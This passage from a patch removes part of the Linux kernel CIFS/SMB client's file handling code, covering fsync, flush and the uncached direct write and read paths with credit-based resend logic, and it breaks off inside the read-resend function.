+-int cifs_strict_fsync(struct file *file, loff_t start, loff_t end,
+-		      int datasync)
+-{
+-	unsigned int xid;
+-	int rc = 0;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifsFileInfo *smbfile = file->private_data;
+-	struct inode *inode = file_inode(file);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	rc = file_write_and_wait_range(file, start, end);
+-	if (rc) {
+-		trace_cifs_fsync_err(inode->i_ino, rc);
+-		return rc;
+-	}
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "Sync file - name: %pD datasync: 0x%x\n",
+-		 file, datasync);
+-
+-	if (!CIFS_CACHE_READ(CIFS_I(inode))) {
+-		rc = cifs_zap_mapping(inode);
+-		if (rc) {
+-			cifs_dbg(FYI, "rc: %d during invalidate phase\n", rc);
+-			rc = 0; /* don't care about it in fsync */
+-		}
+-	}
+-
+-	tcon = tlink_tcon(smbfile->tlink);
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
+-		server = tcon->ses->server;
+-		if (server->ops->flush == NULL) {
+-			rc = -ENOSYS;
+-			goto strict_fsync_exit;
+-		}
+-
+-		if ((OPEN_FMODE(smbfile->f_flags) & FMODE_WRITE) == 0) {
+-			smbfile = find_writable_file(CIFS_I(inode), FIND_WR_ANY);
+-			if (smbfile) {
+-				rc = server->ops->flush(xid, tcon, &smbfile->fid);
+-				cifsFileInfo_put(smbfile);
+-			} else
+-				cifs_dbg(FYI, "ignore fsync for file not open for write\n");
+-		} else
+-			rc = server->ops->flush(xid, tcon, &smbfile->fid);
+-	}
+-
+-strict_fsync_exit:
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-int cifs_fsync(struct file *file, loff_t start, loff_t end, int datasync)
+-{
+-	unsigned int xid;
+-	int rc = 0;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifsFileInfo *smbfile = file->private_data;
+-	struct inode *inode = file_inode(file);
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
+-
+-	rc = file_write_and_wait_range(file, start, end);
+-	if (rc) {
+-		trace_cifs_fsync_err(file_inode(file)->i_ino, rc);
+-		return rc;
+-	}
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "Sync file - name: %pD datasync: 0x%x\n",
+-		 file, datasync);
+-
+-	tcon = tlink_tcon(smbfile->tlink);
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
+-		server = tcon->ses->server;
+-		if (server->ops->flush == NULL) {
+-			rc = -ENOSYS;
+-			goto fsync_exit;
+-		}
+-
+-		if ((OPEN_FMODE(smbfile->f_flags) & FMODE_WRITE) == 0) {
+-			smbfile = find_writable_file(CIFS_I(inode), FIND_WR_ANY);
+-			if (smbfile) {
+-				rc = server->ops->flush(xid, tcon, &smbfile->fid);
+-				cifsFileInfo_put(smbfile);
+-			} else
+-				cifs_dbg(FYI, "ignore fsync for file not open for write\n");
+-		} else
+-			rc = server->ops->flush(xid, tcon, &smbfile->fid);
+-	}
+-
+-fsync_exit:
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-/*
+- * As file closes, flush all cached write data for this inode checking
+- * for write behind errors.
+- */
+-int cifs_flush(struct file *file, fl_owner_t id)
+-{
+-	struct inode *inode = file_inode(file);
+-	int rc = 0;
+-
+-	if (file->f_mode & FMODE_WRITE)
+-		rc = filemap_write_and_wait(inode->i_mapping);
+-
+-	cifs_dbg(FYI, "Flush inode %p file %p rc %d\n", inode, file, rc);
+-	if (rc) {
+-		/* get more nuanced writeback errors */
+-		rc = filemap_check_wb_err(file->f_mapping, 0);
+-		trace_cifs_flush_err(inode->i_ino, rc);
+-	}
+-	return rc;
+-}
+-
+-static int
+-cifs_write_allocate_pages(struct page **pages, unsigned long num_pages)
+-{
+-	int rc = 0;
+-	unsigned long i;
+-
+-	for (i = 0; i < num_pages; i++) {
+-		pages[i] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
+-		if (!pages[i]) {
+-			/*
+-			 * save number of pages we have already allocated and
+-			 * return with ENOMEM error
+-			 */
+-			num_pages = i;
+-			rc = -ENOMEM;
+-			break;
+-		}
+-	}
+-
+-	if (rc) {
+-		for (i = 0; i < num_pages; i++)
+-			put_page(pages[i]);
+-	}
+-	return rc;
+-}
+-
+-static inline
+-size_t get_numpages(const size_t wsize, const size_t len, size_t *cur_len)
+-{
+-	size_t num_pages;
+-	size_t clen;
+-
+-	clen = min_t(const size_t, len, wsize);
+-	num_pages = DIV_ROUND_UP(clen, PAGE_SIZE);
+-
+-	if (cur_len)
+-		*cur_len = clen;
+-
+-	return num_pages;
+-}
+-
+-static void
+-cifs_uncached_writedata_release(struct kref *refcount)
+-{
+-	int i;
+-	struct cifs_writedata *wdata = container_of(refcount,
+-					struct cifs_writedata, refcount);
+-
+-	kref_put(&wdata->ctx->refcount, cifs_aio_ctx_release);
+-	for (i = 0; i < wdata->nr_pages; i++)
+-		put_page(wdata->pages[i]);
+-	cifs_writedata_release(refcount);
+-}
+-
+-static void collect_uncached_write_data(struct cifs_aio_ctx *ctx);
+-
+-static void
+-cifs_uncached_writev_complete(struct work_struct *work)
+-{
+-	struct cifs_writedata *wdata = container_of(work,
+-					struct cifs_writedata, work);
+-	struct inode *inode = d_inode(wdata->cfile->dentry);
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-
+-	spin_lock(&inode->i_lock);
+-	cifs_update_eof(cifsi, wdata->offset, wdata->bytes);
+-	if (cifsi->server_eof > inode->i_size)
+-		i_size_write(inode, cifsi->server_eof);
+-	spin_unlock(&inode->i_lock);
+-
+-	complete(&wdata->done);
+-	collect_uncached_write_data(wdata->ctx);
+-	/* the below call can possibly free the last ref to aio ctx */
+-	kref_put(&wdata->refcount, cifs_uncached_writedata_release);
+-}
+-
+-static int
+-wdata_fill_from_iovec(struct cifs_writedata *wdata, struct iov_iter *from,
+-		      size_t *len, unsigned long *num_pages)
+-{
+-	size_t save_len, copied, bytes, cur_len = *len;
+-	unsigned long i, nr_pages = *num_pages;
+-
+-	save_len = cur_len;
+-	for (i = 0; i < nr_pages; i++) {
+-		bytes = min_t(const size_t, cur_len, PAGE_SIZE);
+-		copied = copy_page_from_iter(wdata->pages[i], 0, bytes, from);
+-		cur_len -= copied;
+-		/*
+-		 * If we didn't copy as much as we expected, then that
+-		 * may mean we trod into an unmapped area. Stop copying
+-		 * at that point. On the next pass through the big
+-		 * loop, we'll likely end up getting a zero-length
+-		 * write and bailing out of it.
+-		 */
+-		if (copied < bytes)
+-			break;
+-	}
+-	cur_len = save_len - cur_len;
+-	*len = cur_len;
+-
+-	/*
+-	 * If we have no data to send, then that probably means that
+-	 * the copy above failed altogether. That's most likely because
+-	 * the address in the iovec was bogus. Return -EFAULT and let
+-	 * the caller free anything we allocated and bail out.
+-	 */
+-	if (!cur_len)
+-		return -EFAULT;
+-
+-	/*
+-	 * i + 1 now represents the number of pages we actually used in
+-	 * the copy phase above.
+-	 */
+-	*num_pages = i + 1;
+-	return 0;
+-}
+-
+-static int
+-cifs_resend_wdata(struct cifs_writedata *wdata, struct list_head *wdata_list,
+-	struct cifs_aio_ctx *ctx)
+-{
+-	unsigned int wsize;
+-	struct cifs_credits credits;
+-	int rc;
+-	struct TCP_Server_Info *server = wdata->server;
+-
+-	do {
+-		if (wdata->cfile->invalidHandle) {
+-			rc = cifs_reopen_file(wdata->cfile, false);
+-			if (rc == -EAGAIN)
+-				continue;
+-			else if (rc)
+-				break;
+-		}
+-
+-
+-		/*
+-		 * Wait for credits to resend this wdata.
+-		 * Note: we are attempting to resend the whole wdata not in
+-		 * segments
+-		 */
+-		do {
+-			rc = server->ops->wait_mtu_credits(server, wdata->bytes,
+-						&wsize, &credits);
+-			if (rc)
+-				goto fail;
+-
+-			if (wsize < wdata->bytes) {
+-				add_credits_and_wake_if(server, &credits, 0);
+-				msleep(1000);
+-			}
+-		} while (wsize < wdata->bytes);
+-		wdata->credits = credits;
+-
+-		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
+-
+-		if (!rc) {
+-			if (wdata->cfile->invalidHandle)
+-				rc = -EAGAIN;
+-			else {
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-				if (wdata->mr) {
+-					wdata->mr->need_invalidate = true;
+-					smbd_deregister_mr(wdata->mr);
+-					wdata->mr = NULL;
+-				}
+-#endif
+-				rc = server->ops->async_writev(wdata,
+-					cifs_uncached_writedata_release);
+-			}
+-		}
+-
+-		/* If the write was successfully sent, we are done */
+-		if (!rc) {
+-			list_add_tail(&wdata->list, wdata_list);
+-			return 0;
+-		}
+-
+-		/* Roll back credits and retry if needed */
+-		add_credits_and_wake_if(server, &wdata->credits, 0);
+-	} while (rc == -EAGAIN);
+-
+-fail:
+-	kref_put(&wdata->refcount, cifs_uncached_writedata_release);
+-	return rc;
+-}
+-
+-static int
+-cifs_write_from_iter(loff_t offset, size_t len, struct iov_iter *from,
+-		     struct cifsFileInfo *open_file,
+-		     struct cifs_sb_info *cifs_sb, struct list_head *wdata_list,
+-		     struct cifs_aio_ctx *ctx)
+-{
+-	int rc = 0;
+-	size_t cur_len;
+-	unsigned long nr_pages, num_pages, i;
+-	struct cifs_writedata *wdata;
+-	struct iov_iter saved_from = *from;
+-	loff_t saved_offset = offset;
+-	pid_t pid;
+-	struct TCP_Server_Info *server;
+-	struct page **pagevec;
+-	size_t start;
+-	unsigned int xid;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		pid = open_file->pid;
+-	else
+-		pid = current->tgid;
+-
+-	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
+-	xid = get_xid();
+-
+-	do {
+-		unsigned int wsize;
+-		struct cifs_credits credits_on_stack;
+-		struct cifs_credits *credits = &credits_on_stack;
+-
+-		if (open_file->invalidHandle) {
+-			rc = cifs_reopen_file(open_file, false);
+-			if (rc == -EAGAIN)
+-				continue;
+-			else if (rc)
+-				break;
+-		}
+-
+-		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->wsize,
+-						   &wsize, credits);
+-		if (rc)
+-			break;
+-
+-		cur_len = min_t(const size_t, len, wsize);
+-
+-		if (ctx->direct_io) {
+-			ssize_t result;
+-
+-			result = iov_iter_get_pages_alloc2(
+-				from, &pagevec, cur_len, &start);
+-			if (result < 0) {
+-				cifs_dbg(VFS,
+-					 "direct_writev couldn't get user pages (rc=%zd) iter type %d iov_offset %zd count %zd\n",
+-					 result, iov_iter_type(from),
+-					 from->iov_offset, from->count);
+-				dump_stack();
+-
+-				rc = result;
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-			cur_len = (size_t)result;
+-
+-			nr_pages =
+-				(cur_len + start + PAGE_SIZE - 1) / PAGE_SIZE;
+-
+-			wdata = cifs_writedata_direct_alloc(pagevec,
+-					     cifs_uncached_writev_complete);
+-			if (!wdata) {
+-				rc = -ENOMEM;
+-				for (i = 0; i < nr_pages; i++)
+-					put_page(pagevec[i]);
+-				kvfree(pagevec);
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-
+-
+-			wdata->page_offset = start;
+-			wdata->tailsz =
+-				nr_pages > 1 ?
+-					cur_len - (PAGE_SIZE - start) -
+-					(nr_pages - 2) * PAGE_SIZE :
+-					cur_len;
+-		} else {
+-			nr_pages = get_numpages(wsize, len, &cur_len);
+-			wdata = cifs_writedata_alloc(nr_pages,
+-					     cifs_uncached_writev_complete);
+-			if (!wdata) {
+-				rc = -ENOMEM;
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-
+-			rc = cifs_write_allocate_pages(wdata->pages, nr_pages);
+-			if (rc) {
+-				kvfree(wdata->pages);
+-				kfree(wdata);
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-
+-			num_pages = nr_pages;
+-			rc = wdata_fill_from_iovec(
+-				wdata, from, &cur_len, &num_pages);
+-			if (rc) {
+-				for (i = 0; i < nr_pages; i++)
+-					put_page(wdata->pages[i]);
+-				kvfree(wdata->pages);
+-				kfree(wdata);
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-
+-			/*
+-			 * Bring nr_pages down to the number of pages we
+-			 * actually used, and free any pages that we didn't use.
+-			 */
+-			for ( ; nr_pages > num_pages; nr_pages--)
+-				put_page(wdata->pages[nr_pages - 1]);
+-
+-			wdata->tailsz = cur_len - ((nr_pages - 1) * PAGE_SIZE);
+-		}
+-
+-		wdata->sync_mode = WB_SYNC_ALL;
+-		wdata->nr_pages = nr_pages;
+-		wdata->offset = (__u64)offset;
+-		wdata->cfile = cifsFileInfo_get(open_file);
+-		wdata->server = server;
+-		wdata->pid = pid;
+-		wdata->bytes = cur_len;
+-		wdata->pagesz = PAGE_SIZE;
+-		wdata->credits = credits_on_stack;
+-		wdata->ctx = ctx;
+-		kref_get(&ctx->refcount);
+-
+-		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
+-
+-		if (!rc) {
+-			if (wdata->cfile->invalidHandle)
+-				rc = -EAGAIN;
+-			else
+-				rc = server->ops->async_writev(wdata,
+-					cifs_uncached_writedata_release);
+-		}
+-
+-		if (rc) {
+-			add_credits_and_wake_if(server, &wdata->credits, 0);
+-			kref_put(&wdata->refcount,
+-				 cifs_uncached_writedata_release);
+-			if (rc == -EAGAIN) {
+-				*from = saved_from;
+-				iov_iter_advance(from, offset - saved_offset);
+-				continue;
+-			}
+-			break;
+-		}
+-
+-		list_add_tail(&wdata->list, wdata_list);
+-		offset += cur_len;
+-		len -= cur_len;
+-	} while (len > 0);
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static void collect_uncached_write_data(struct cifs_aio_ctx *ctx)
+-{
+-	struct cifs_writedata *wdata, *tmp;
+-	struct cifs_tcon *tcon;
+-	struct cifs_sb_info *cifs_sb;
+-	struct dentry *dentry = ctx->cfile->dentry;
+-	ssize_t rc;
+-
+-	tcon = tlink_tcon(ctx->cfile->tlink);
+-	cifs_sb = CIFS_SB(dentry->d_sb);
+-
+-	mutex_lock(&ctx->aio_mutex);
+-
+-	if (list_empty(&ctx->list)) {
+-		mutex_unlock(&ctx->aio_mutex);
+-		return;
+-	}
+-
+-	rc = ctx->rc;
+-	/*
+-	 * Wait for and collect replies for any successful sends in order of
+-	 * increasing offset. Once an error is hit, then return without waiting
+-	 * for any more replies.
+-	 */
+-restart_loop:
+-	list_for_each_entry_safe(wdata, tmp, &ctx->list, list) {
+-		if (!rc) {
+-			if (!try_wait_for_completion(&wdata->done)) {
+-				mutex_unlock(&ctx->aio_mutex);
+-				return;
+-			}
+-
+-			if (wdata->result)
+-				rc = wdata->result;
+-			else
+-				ctx->total_len += wdata->bytes;
+-
+-			/* resend call if it's a retryable error */
+-			if (rc == -EAGAIN) {
+-				struct list_head tmp_list;
+-				struct iov_iter tmp_from = ctx->iter;
+-
+-				INIT_LIST_HEAD(&tmp_list);
+-				list_del_init(&wdata->list);
+-
+-				if (ctx->direct_io)
+-					rc = cifs_resend_wdata(
+-						wdata, &tmp_list, ctx);
+-				else {
+-					iov_iter_advance(&tmp_from,
+-						 wdata->offset - ctx->pos);
+-
+-					rc = cifs_write_from_iter(wdata->offset,
+-						wdata->bytes, &tmp_from,
+-						ctx->cfile, cifs_sb, &tmp_list,
+-						ctx);
+-
+-					kref_put(&wdata->refcount,
+-						cifs_uncached_writedata_release);
+-				}
+-
+-				list_splice(&tmp_list, &ctx->list);
+-				goto restart_loop;
+-			}
+-		}
+-		list_del_init(&wdata->list);
+-		kref_put(&wdata->refcount, cifs_uncached_writedata_release);
+-	}
+-
+-	cifs_stats_bytes_written(tcon, ctx->total_len);
+-	set_bit(CIFS_INO_INVALID_MAPPING, &CIFS_I(dentry->d_inode)->flags);
+-
+-	ctx->rc = (rc == 0) ? ctx->total_len : rc;
+-
+-	mutex_unlock(&ctx->aio_mutex);
+-
+-	if (ctx->iocb && ctx->iocb->ki_complete)
+-		ctx->iocb->ki_complete(ctx->iocb, ctx->rc);
+-	else
+-		complete(&ctx->done);
+-}
+-
+-static ssize_t __cifs_writev(
+-	struct kiocb *iocb, struct iov_iter *from, bool direct)
+-{
+-	struct file *file = iocb->ki_filp;
+-	ssize_t total_written = 0;
+-	struct cifsFileInfo *cfile;
+-	struct cifs_tcon *tcon;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_aio_ctx *ctx;
+-	struct iov_iter saved_from = *from;
+-	size_t len = iov_iter_count(from);
+-	int rc;
+-
+-	/*
+-	 * iov_iter_get_pages_alloc doesn't work with ITER_KVEC.
+-	 * In this case, fall back to non-direct write function.
+-	 * this could be improved by getting pages directly in ITER_KVEC
+-	 */
+-	if (direct && iov_iter_is_kvec(from)) {
+-		cifs_dbg(FYI, "use non-direct cifs_writev for kvec I/O\n");
+-		direct = false;
+-	}
+-
+-	rc = generic_write_checks(iocb, from);
+-	if (rc <= 0)
+-		return rc;
+-
+-	cifs_sb = CIFS_FILE_SB(file);
+-	cfile = file->private_data;
+-	tcon = tlink_tcon(cfile->tlink);
+-
+-	if (!tcon->ses->server->ops->async_writev)
+-		return -ENOSYS;
+-
+-	ctx = cifs_aio_ctx_alloc();
+-	if (!ctx)
+-		return -ENOMEM;
+-
+-	ctx->cfile = cifsFileInfo_get(cfile);
+-
+-	if (!is_sync_kiocb(iocb))
+-		ctx->iocb = iocb;
+-
+-	ctx->pos = iocb->ki_pos;
+-
+-	if (direct) {
+-		ctx->direct_io = true;
+-		ctx->iter = *from;
+-		ctx->len = len;
+-	} else {
+-		rc = setup_aio_ctx_iter(ctx, from, ITER_SOURCE);
+-		if (rc) {
+-			kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-			return rc;
+-		}
+-	}
+-
+-	/* grab a lock here due to read response handlers can access ctx */
+-	mutex_lock(&ctx->aio_mutex);
+-
+-	rc = cifs_write_from_iter(iocb->ki_pos, ctx->len, &saved_from,
+-				  cfile, cifs_sb, &ctx->list, ctx);
+-
+-	/*
+-	 * If at least one write was successfully sent, then discard any rc
+-	 * value from the later writes. If the other write succeeds, then
+-	 * we'll end up returning whatever was written. If it fails, then
+-	 * we'll get a new rc value from that.
+-	 */
+-	if (!list_empty(&ctx->list))
+-		rc = 0;
+-
+-	mutex_unlock(&ctx->aio_mutex);
+-
+-	if (rc) {
+-		kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-		return rc;
+-	}
+-
+-	if (!is_sync_kiocb(iocb)) {
+-		kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-		return -EIOCBQUEUED;
+-	}
+-
+-	rc = wait_for_completion_killable(&ctx->done);
+-	if (rc) {
+-		mutex_lock(&ctx->aio_mutex);
+-		ctx->rc = rc = -EINTR;
+-		total_written = ctx->total_len;
+-		mutex_unlock(&ctx->aio_mutex);
+-	} else {
+-		rc = ctx->rc;
+-		total_written = ctx->total_len;
+-	}
+-
+-	kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-
+-	if (unlikely(!total_written))
+-		return rc;
+-
+-	iocb->ki_pos += total_written;
+-	return total_written;
+-}
+-
+-ssize_t cifs_direct_writev(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct file *file = iocb->ki_filp;
+-
+-	cifs_revalidate_mapping(file->f_inode);
+-	return __cifs_writev(iocb, from, true);
+-}
+-
+-ssize_t cifs_user_writev(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	return __cifs_writev(iocb, from, false);
+-}
+-
+-static ssize_t
+-cifs_writev(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct file *file = iocb->ki_filp;
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
+-	struct inode *inode = file->f_mapping->host;
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
+-	ssize_t rc;
+-
+-	inode_lock(inode);
+-	/*
+-	 * We need to hold the sem to be sure nobody modifies lock list
+-	 * with a brlock that prevents writing.
+-	 */
+-	down_read(&cinode->lock_sem);
+-
+-	rc = generic_write_checks(iocb, from);
+-	if (rc <= 0)
+-		goto out;
+-
+-	if (!cifs_find_lock_conflict(cfile, iocb->ki_pos, iov_iter_count(from),
+-				     server->vals->exclusive_lock_type, 0,
+-				     NULL, CIFS_WRITE_OP))
+-		rc = __generic_file_write_iter(iocb, from);
+-	else
+-		rc = -EACCES;
+-out:
+-	up_read(&cinode->lock_sem);
+-	inode_unlock(inode);
+-
+-	if (rc > 0)
+-		rc = generic_write_sync(iocb, rc);
+-	return rc;
+-}
+-
+-ssize_t
+-cifs_strict_writev(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *)
+-						iocb->ki_filp->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	ssize_t written;
+-
+-	written = cifs_get_writer(cinode);
+-	if (written)
+-		return written;
+-
+-	if (CIFS_CACHE_WRITE(cinode)) {
+-		if (cap_unix(tcon->ses) &&
+-		(CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability))
+-		  && ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0)) {
+-			written = generic_file_write_iter(iocb, from);
+-			goto out;
+-		}
+-		written = cifs_writev(iocb, from);
+-		goto out;
+-	}
+-	/*
+-	 * For non-oplocked files in strict cache mode we need to write the data
+-	 * to the server exactly from the pos to pos+len-1 rather than flush all
+-	 * affected pages because it may cause a error with mandatory locks on
+-	 * these pages but not on the region from pos to ppos+len-1.
+-	 */
+-	written = cifs_user_writev(iocb, from);
+-	if (CIFS_CACHE_READ(cinode)) {
+-		/*
+-		 * We have read level caching and we have just sent a write
+-		 * request to the server thus making data in the cache stale.
+-		 * Zap the cache and set oplock/lease level to NONE to avoid
+-		 * reading stale data from the cache. All subsequent read
+-		 * operations will read new data from the server.
+-		 */
+-		cifs_zap_mapping(inode);
+-		cifs_dbg(FYI, "Set Oplock/Lease to NONE for inode=%p after write\n",
+-			 inode);
+-		cinode->oplock = 0;
+-	}
+-out:
+-	cifs_put_writer(cinode);
+-	return written;
+-}
+-
+-static struct cifs_readdata *
+-cifs_readdata_direct_alloc(struct page **pages, work_func_t complete)
+-{
+-	struct cifs_readdata *rdata;
+-
+-	rdata = kzalloc(sizeof(*rdata), GFP_KERNEL);
+-	if (rdata != NULL) {
+-		rdata->pages = pages;
+-		kref_init(&rdata->refcount);
+-		INIT_LIST_HEAD(&rdata->list);
+-		init_completion(&rdata->done);
+-		INIT_WORK(&rdata->work, complete);
+-	}
+-
+-	return rdata;
+-}
+-
+-static struct cifs_readdata *
+-cifs_readdata_alloc(unsigned int nr_pages, work_func_t complete)
+-{
+-	struct page **pages =
+-		kcalloc(nr_pages, sizeof(struct page *), GFP_KERNEL);
+-	struct cifs_readdata *ret = NULL;
+-
+-	if (pages) {
+-		ret = cifs_readdata_direct_alloc(pages, complete);
+-		if (!ret)
+-			kfree(pages);
+-	}
+-
+-	return ret;
+-}
+-
+-void
+-cifs_readdata_release(struct kref *refcount)
+-{
+-	struct cifs_readdata *rdata = container_of(refcount,
+-					struct cifs_readdata, refcount);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	if (rdata->mr) {
+-		smbd_deregister_mr(rdata->mr);
+-		rdata->mr = NULL;
+-	}
+-#endif
+-	if (rdata->cfile)
+-		cifsFileInfo_put(rdata->cfile);
+-
+-	kvfree(rdata->pages);
+-	kfree(rdata);
+-}
+-
+-static int
+-cifs_read_allocate_pages(struct cifs_readdata *rdata, unsigned int nr_pages)
+-{
+-	int rc = 0;
+-	struct page *page;
+-	unsigned int i;
+-
+-	for (i = 0; i < nr_pages; i++) {
+-		page = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
+-		if (!page) {
+-			rc = -ENOMEM;
+-			break;
+-		}
+-		rdata->pages[i] = page;
+-	}
+-
+-	if (rc) {
+-		unsigned int nr_page_failed = i;
+-
+-		for (i = 0; i < nr_page_failed; i++) {
+-			put_page(rdata->pages[i]);
+-			rdata->pages[i] = NULL;
+-		}
+-	}
+-	return rc;
+-}
+-
+-static void
+-cifs_uncached_readdata_release(struct kref *refcount)
+-{
+-	struct cifs_readdata *rdata = container_of(refcount,
+-					struct cifs_readdata, refcount);
+-	unsigned int i;
+-
+-	kref_put(&rdata->ctx->refcount, cifs_aio_ctx_release);
+-	for (i = 0; i < rdata->nr_pages; i++) {
+-		put_page(rdata->pages[i]);
+-	}
+-	cifs_readdata_release(refcount);
+-}
+-
+-/**
+- * cifs_readdata_to_iov - copy data from pages in response to an iovec
+- * @rdata:	the readdata response with list of pages holding data
+- * @iter:	destination for our data
+- *
+- * This function copies data from a list of pages in a readdata response into
+- * an array of iovecs. It will first calculate where the data should go
+- * based on the info in the readdata and then copy the data into that spot.
+- */
+-static int
+-cifs_readdata_to_iov(struct cifs_readdata *rdata, struct iov_iter *iter)
+-{
+-	size_t remaining = rdata->got_bytes;
+-	unsigned int i;
+-
+-	for (i = 0; i < rdata->nr_pages; i++) {
+-		struct page *page = rdata->pages[i];
+-		size_t copy = min_t(size_t, remaining, PAGE_SIZE);
+-		size_t written;
+-
+-		if (unlikely(iov_iter_is_pipe(iter))) {
+-			void *addr = kmap_atomic(page);
+-
+-			written = copy_to_iter(addr, copy, iter);
+-			kunmap_atomic(addr);
+-		} else
+-			written = copy_page_to_iter(page, 0, copy, iter);
+-		remaining -= written;
+-		if (written < copy && iov_iter_count(iter) > 0)
+-			break;
+-	}
+-	return remaining ? -EFAULT : 0;
+-}
+-
+-static void collect_uncached_read_data(struct cifs_aio_ctx *ctx);
+-
+-static void
+-cifs_uncached_readv_complete(struct work_struct *work)
+-{
+-	struct cifs_readdata *rdata = container_of(work,
+-						struct cifs_readdata, work);
+-
+-	complete(&rdata->done);
+-	collect_uncached_read_data(rdata->ctx);
+-	/* the below call can possibly free the last ref to aio ctx */
+-	kref_put(&rdata->refcount, cifs_uncached_readdata_release);
+-}
+-
+-static int
+-uncached_fill_pages(struct TCP_Server_Info *server,
+-		    struct cifs_readdata *rdata, struct iov_iter *iter,
+-		    unsigned int len)
+-{
+-	int result = 0;
+-	unsigned int i;
+-	unsigned int nr_pages = rdata->nr_pages;
+-	unsigned int page_offset = rdata->page_offset;
+-
+-	rdata->got_bytes = 0;
+-	rdata->tailsz = PAGE_SIZE;
+-	for (i = 0; i < nr_pages; i++) {
+-		struct page *page = rdata->pages[i];
+-		size_t n;
+-		unsigned int segment_size = rdata->pagesz;
+-
+-		if (i == 0)
+-			segment_size -= page_offset;
+-		else
+-			page_offset = 0;
+-
+-
+-		if (len <= 0) {
+-			/* no need to hold page hostage */
+-			rdata->pages[i] = NULL;
+-			rdata->nr_pages--;
+-			put_page(page);
+-			continue;
+-		}
+-
+-		n = len;
+-		if (len >= segment_size)
+-			/* enough data to fill the page */
+-			n = segment_size;
+-		else
+-			rdata->tailsz = len;
+-		len -= n;
+-
+-		if (iter)
+-			result = copy_page_from_iter(
+-					page, page_offset, n, iter);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-		else if (rdata->mr)
+-			result = n;
+-#endif
+-		else
+-			result = cifs_read_page_from_socket(
+-					server, page, page_offset, n);
+-		if (result < 0)
+-			break;
+-
+-		rdata->got_bytes += result;
+-	}
+-
+-	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
+-						rdata->got_bytes : result;
+-}
+-
+-static int
+-cifs_uncached_read_into_pages(struct TCP_Server_Info *server,
+-			      struct cifs_readdata *rdata, unsigned int len)
+-{
+-	return uncached_fill_pages(server, rdata, NULL, len);
+-}
+-
+-static int
+-cifs_uncached_copy_into_pages(struct TCP_Server_Info *server,
+-			      struct cifs_readdata *rdata,
+-			      struct iov_iter *iter)
+-{
+-	return uncached_fill_pages(server, rdata, iter, iter->count);
+-}
+-
+-static int cifs_resend_rdata(struct cifs_readdata *rdata,
+-			struct list_head *rdata_list,
+-			struct cifs_aio_ctx *ctx)
+-{
+-	unsigned int rsize;
+-	struct cifs_credits credits;
+-	int rc;
+-	struct TCP_Server_Info *server;
+-
+-	/* XXX: should we pick a new channel here? */
+-	server = rdata->server;
+-
+-	do {
+-		if (rdata->cfile->invalidHandle) {
+-			rc = cifs_reopen_file(rdata->cfile, true);
+-			if (rc == -EAGAIN)
+-				continue;
+-			else if (rc)
+-				break;
+-		}
+-
+-		/*
+-		 * Wait for credits to resend this rdata.
+-		 * Note: we are attempting to resend the whole rdata not in
+-		 * segments
+-		 */
+-		do {
+-			rc = server->ops->wait_mtu_credits(server, rdata->bytes,
+-						&rsize, &credits);
+-
+-			if (rc)
+-				goto fail;
+-
+-			if (rsize < rdata->bytes) {
+-				add_credits_and_wake_if(server, &credits, 0);
+-				msleep(1000);
+-			}
+-		} while (rsize < rdata->bytes);
+-		rdata->credits = credits;
+-
+-		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
+-		if (!rc) {
+-			if (rdata->cfile->invalidHandle)
+-				rc = -EAGAIN;
+-			else {
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-				if (rdata->mr) {
+-					rdata->mr->need_invalidate = true;
+-					smbd_deregister_mr(rdata->mr);
+-					rdata->mr = NULL;
+-				}
+-#endif
+-				rc = server->ops->async_readv(rdata);
+-			}
+-		}
+-
+-		/* If the read was successfully sent, we are done */
+-		if (!rc) {
+-			/* Add to aio pending list */
